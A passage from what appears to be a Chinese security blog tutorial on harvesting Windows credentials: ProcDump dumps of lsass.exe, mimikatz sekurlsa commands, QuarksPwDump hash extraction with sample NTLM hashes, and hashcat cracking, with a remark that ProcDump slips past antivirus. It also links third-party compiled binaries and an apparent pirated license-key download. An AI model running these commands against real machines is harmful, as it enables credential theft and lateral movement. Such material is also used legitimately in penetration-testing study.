* Username : sqlsec
* Domain : MACBOOKPRO
* NTLM : f00a25418f128daaef2bc89ed94416bd
* SHA1 : 56d7741bca89552362fd24d11bb8980e3d8a444c
tspkg :
wdigest :
* Username : sqlsec
* Domain : MACBOOKPRO
* Password :
kerberos :
* Username : sqlsec
* Domain : MACBOOKPRO
* Password :
ssp :
credman :
主要有如下的关键信息:
文章插图
Windows 10无法使用mimikatz读取到明文密码 , 只能直接读取到加密后的NTLM值 。
ProcDump + mimikatz
文章插图
官网地址:ProcDump v9.0
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
ProcDump是一个命令行程序 , 可以很方便地将系统正在运行的进程转存储生成为dump文件又因为是微软自家出品 , 所以可以过很多杀软 。
dump lsass.exe进程
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
x86 x64 分别执行对应的可执行文件 因为本次测试系统为 64位 故执行 procdump64.exe
此时会在当前shell运行的目录下生成lsass.dmp , 这个是lsass.exe进程转存储的文件 , 里面记录了Hash信息 。
对于NT6及其以上的系统也可以使用Windows自带的功能进行dump:
任务管理器点击显示所有用户的进程 , 然后找到 lsass.exe的进程 , 右键 , 选择创建转存储文件
文章插图
读取dmp文件信息
将上面转存储生成的lsass.dmp文件放到mimikatz.exe的同目录下 , 执行下面非交互命令可以直接读取密码:
# 直接读取明文密码
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::tspkg" exit
# 读取明文密码 + Hash值 信息更全
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" exit
QuarksPwDump
文章插图
QuarksPwDump是一个Win32环境下系统授权信息导出工具 , 支持Windows众多的OS版本:XP/2003/Vista/7/2008/8 (Windows10 国光测试失败 并没有成功读取到Hash)
项目地址:
https://github.com/quarkslab/quarkspwdump
目前作者只是开源了源代码 , 没有发布已经编译好的版本 , 所以大家使用的话得寄几用VS Studio编译一下 。下面国光本人自己编译好的版本如下 , 有需要的朋友可以自行下载:
文件名:QuarksPwDump.exe
https://uijay-my.sharepoint.com/:u:/g/personal/aywtc_myoffice_fun/ETcuCjmWyylJkO8p4dtnJR4BzHbmgb8Nq7musD32XNmbyQ?e=7nAXHn
文件名:VC++2010学习版和永久使用注册码.zip
https://uijay-my.sharepoint.com/:u:/g/personal/aywtc_myoffice_fun/EbPp8H8FRL9IkofM35XIn7AB6tASaLPHtT4l3t9e69KxcQ?e=zecfJu)
另外Githun还有其他大牛已经编译好了更新的版本 , 我们也可以直接下载:
https://github.com/redcanari/quarkspwdump/releases
这个新的 QuarksPwDumpv_0.3a版本中新增了-sf参数
QuarksPwDump抓取密码的命令如下:
QuarksPwDump.exe -dhl -o hash.txt
抓取Hash并在同目录下生成hash.txt文件 , 抓取到具体的Hash如下:
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42:::
提取Administrator用户的关键密码信息为:E19CCF75EE54E06B06A5907AF13CEF42 , 他实际上是P@ssw0rd的NTLM加密的值 , 可以用Hashcat来进行破解
No.4
HashWindows Hash利用简介
Hashcat破解
拿到LM或者NTLM的密文时 , 如果没有明文的时候 , 最直接的方法当然是直接将其解密啦 , 这里使用Hashcat来进行密码解密 , 对Hashcat这个工具不了解的同学可以参考我写的这篇文章:Hashcat学习记录
https://www.sqlsec.com/2019/10/hashcat.html
假设我们读取到Hash如下:
• LM : 921988ba001dc8e14a3b108f3fa6cb6d
• NTLM : e19ccf75ee54e06b06a5907af13cef42
实际上这个明文是:P@ssw0rd
下面用Hashcat来简单演示一下破解 , 这里破解我使用了-a 0字典破解 , hashcat --help可以看到LM和NTLM对应的hash编号分别为3000和1000
3000 | LM | Operating Systems
1000 | NTLM | Operating Systems
废话不多说 , 下面直接走个流程破解一下吧:
Hashcat破解LM Hash
hashcat -a 0 -m 3000 --force '921988ba001dc8e14a3b108f3fa6cb6d' password.txt
推荐阅读
- 电脑右下角弹窗广告怎么关闭win10?windows10桌面弹出广告?
- 如何永久激活Windows10系统专业版教程
- Windows WDS服务安装配置
- 手把手教你用上更好看的新版 Windows开始菜单
- Windows 10 2004版本如何使用小娜?
- Windows 这些没用的设置,我建议你还是趁早关闭吧
- Windows7固态硬盘卡顿假死怎么办?这个方法照做就能轻松解决
- 网络性能debug参数整理
- 人力资源|藏在裁员大数据中的企业密码
- 量子密码技术 量子密码的安全性